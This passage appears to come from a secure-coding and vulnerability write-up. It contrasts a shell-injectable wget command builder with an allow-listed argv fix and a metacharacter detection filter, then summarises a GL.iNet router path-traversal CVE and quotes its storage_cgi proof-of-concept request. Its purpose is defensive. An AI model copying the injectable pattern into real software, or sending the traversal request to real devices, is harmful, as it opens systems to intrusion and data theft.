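    return 'wget -q -O /tmp/weather "http://weather.example/observe?citycode=%s"' % citycode


def weather_command_fixed(citycode):
    """Allow-list the value, then build argv so no shell ever parses it."""
    if not CITYCODE_RE.fullmatch(citycode):
        raise ValueError('citycode must be 1 to 12 digits')
    return ['wget', '-q', '-O', '/tmp/weather',
            'http://weather.example/observe?citycode=' + citycode]


def run_weather_fixed(citycode):
    """argv goes straight to execve; shell=False is the default but spelled out."""
    return subprocess.run(weather_command_fixed(citycode), shell=False, capture_output=True)


def has_shell_metacharacters(value):
    """Cheap pre-filter for any free-text field that ends up in a system() call,
    e.g. the timezone and update_time parameters in the GL.iNet PoC above."""
    return SHELL_META.search(value) is not None
```

The allow-list is the real fix; the metacharacter filter is only a detection aid (it will not catch every encoding trick, and the GL.iNet update_time payload shows how little an attacker needs once a single quote character gets through).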
| VAR-201903-0452 | CVE-2019-6274 | GL-AR300M-Lite Path Traversal Vulnerability |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
Directory traversal vulnerability in storage_cgi in GL.iNet GL-AR300M-Lite devices with firmware 2.27 allows remote attackers to have unspecified impact via directory traversal sequences. The GL.iNet GL-AR300M-Lite device firmware therefore contains a path traversal vulnerability; possible impact is information disclosure, tampering with information, and denial of service (DoS). The GL-AR300M-Lite is a smart wireless router. No further details are currently available; watch CNNVD or the vendor's announcements. The published proof of concept (an authenticated request to storage_cgi?id=2&pwd=/) is reproduced in full under VAR-201903-0450 (CVE-2019-6272) above.